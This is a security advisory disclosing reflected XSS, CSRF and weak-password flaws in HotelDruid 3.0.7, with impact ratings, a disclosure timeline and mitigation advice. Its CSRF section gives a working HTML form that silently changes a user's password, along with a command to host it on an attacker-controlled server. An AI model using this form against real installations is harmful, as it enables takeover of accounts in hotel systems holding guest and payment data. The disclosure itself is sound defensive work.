Multiple Security Vulnerabilities Discovered in HotelDruid 3.0.7
CVE-2025-25747 | CVE-2025-25748 | CVE-2025-25749
Reported by: Huy Vo, Security Researcher
Description
During a security assessment of HotelDruid version 3.0.7, multiple vulnerabilities were discovered that impact the security and integrity of user accounts and the application itself. These include:
Reflected Cross-Site Scripting (XSS) (CVE-2025-25747) — Allows injection of arbitrary JavaScript in the context of authenticated users’ sessions.
Cross-Site Request Forgery (CSRF) (CVE-2025-25748) — Allows attackers to perform sensitive actions (like password changes) on behalf of authenticated users without their consent.
Weak Password Policy (CVE-2025-25749) — Allows the creation of accounts with extremely weak passwords, increasing the risk of brute force and credential stuffing attacks.
These vulnerabilities, especially when chained, can allow attackers to gain and escalate access, compromise user accounts, and impact the confidentiality and integrity of data stored in the application.
Severity & Impact
CVE ID | Vulnerability Type | Severity | Impact Summary |
CVE-2025-25747 | Reflected XSS | TBD | Arbitrary JavaScript execution, session hijacking, phishing, or malicious redirection. |
CVE-2025-25748 | Cross-Site Request Forgery (CSRF) | TBD | Unauthorized password changes and account takeover. |
CVE-2025-25749 | Weak Password Policy | TBD | Brute force and credential stuffing risks. |
Combined Risk:
An attacker who exploits these vulnerabilities together could easily gain initial access via weak credentials (CVE-2025-25749), escalate to session hijacking (CVE-2025-25747), and modify account credentials via CSRF (CVE-2025-25748). These flaws present serious risks to the integrity and confidentiality of the system.
Proof of Concept (PoC)
CVE-2025-25747 - Reflected XSS
Affected Endpoint
/crea_backup.php
Proof of Concept
Result
An alert box appears confirming successful injection. An attacker could replace the alert with more dangerous scripts (session theft, phishing, etc.).
CVE-2025-25748 - Cross-Site Request Forgery (CSRF)
Affected Endpoint
/gestione_utenti.php
Proof of Concept
Save the following HTML form as csrf_attack.html:
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php"> <input type="hidden" name="anno" value="2025"> <input type="hidden" name="id_sessione" value="<valid_session_id>"> <input type="hidden" name="modifica_pass" value="SI"> <input type="hidden" name="id_utente_pass" value="2"> <input type="hidden" name="prima_pass" value="maliciouspassword"> <input type="hidden" name="seconda_pass" value="maliciouspassword"> <button type="submit">Submit</button></form>
Hosting and Launching the Attack
python3 -m http.server 8080
When a logged-in user visits http://<attacker-ip>:8080/csrf_attack.html and submits the form, the password for user ID 2 is changed to maliciouspassword.
CVE-2025-25749 - Weak Password Policy
Observation
The application accepts weak passwords such as 12345 or admin, does not enforce minimum length, and allows password reuse.
Example Test Cases
Password 12345 - Accepted without warning.
Password admin - Accepted without warning.
Reuse password after changing to password123 - Allowed without restriction.
Multiple rapid password changes - Allowed without delay.
Analysis
Background
HotelDruid is an open-source property management system designed for managing reservations, customers, and billing for hotels, B&Bs, and vacation rentals. Given its role in managing sensitive data (guest information, payment records, etc.), secure authentication and session handling are critical for ensuring data confidentiality and preventing unauthorized access.
Vulnerability Details
CVE-2025-25747 - Reflected XSS
User-supplied input in the ripristina_backup parameter is rendered unsanitized into the page.
Attackers can craft malicious URLs that execute arbitrary JavaScript when visited by authenticated users.
CVE-2025-25748 - CSRF
No anti-CSRF tokens or Referer/Origin validation are present on sensitive actions (e.g., password changes in gestione_utenti.php).
Attackers can trick authenticated users into performing actions without their consent.
CVE-2025-25749 - Weak Password Policy
The application permits excessively weak passwords, including single-character strings, common passwords, and reused passwords.
No real-time feedback, complexity requirements, history checks, or minimum password age policies are present.
Mitigation / Patching
Recommendations
Vulnerability | Recommendations |
Reflected XSS | Input sanitization (e.g., htmlspecialchars()), output encoding, strict Content Security Policy (CSP). |
CSRF | Implement anti-CSRF tokens, validate Origin/Referer headers, restrict sensitive actions to POST requests. |
Weak Passwords | Enforce password complexity, minimum length (8+ characters), restrict reuse of the last 5 passwords, enforce minimum password age (24 hours). |
Additional Recommendations
Regenerate session tokens after authentication.
Avoid placing session tokens in URLs.
Notify users when passwords are changed.
Timeline and Credits
Date | Event |
January 16, 2025 | Vulnerabilities discovered |
January 17, 2025 | Vendor notified |
February 27 2025 | CVE IDs assigned (CVE-2025-25747, CVE-2025-25748, CVE-2025-25749) |
March 7 2025 | Coordinated disclosure published |
Researcher | Huy Vo |
Contact
For questions, further technical details, or assistance with mitigation, please contact:
Huy Vo
Security Researcher | huyvo.net
Comentarios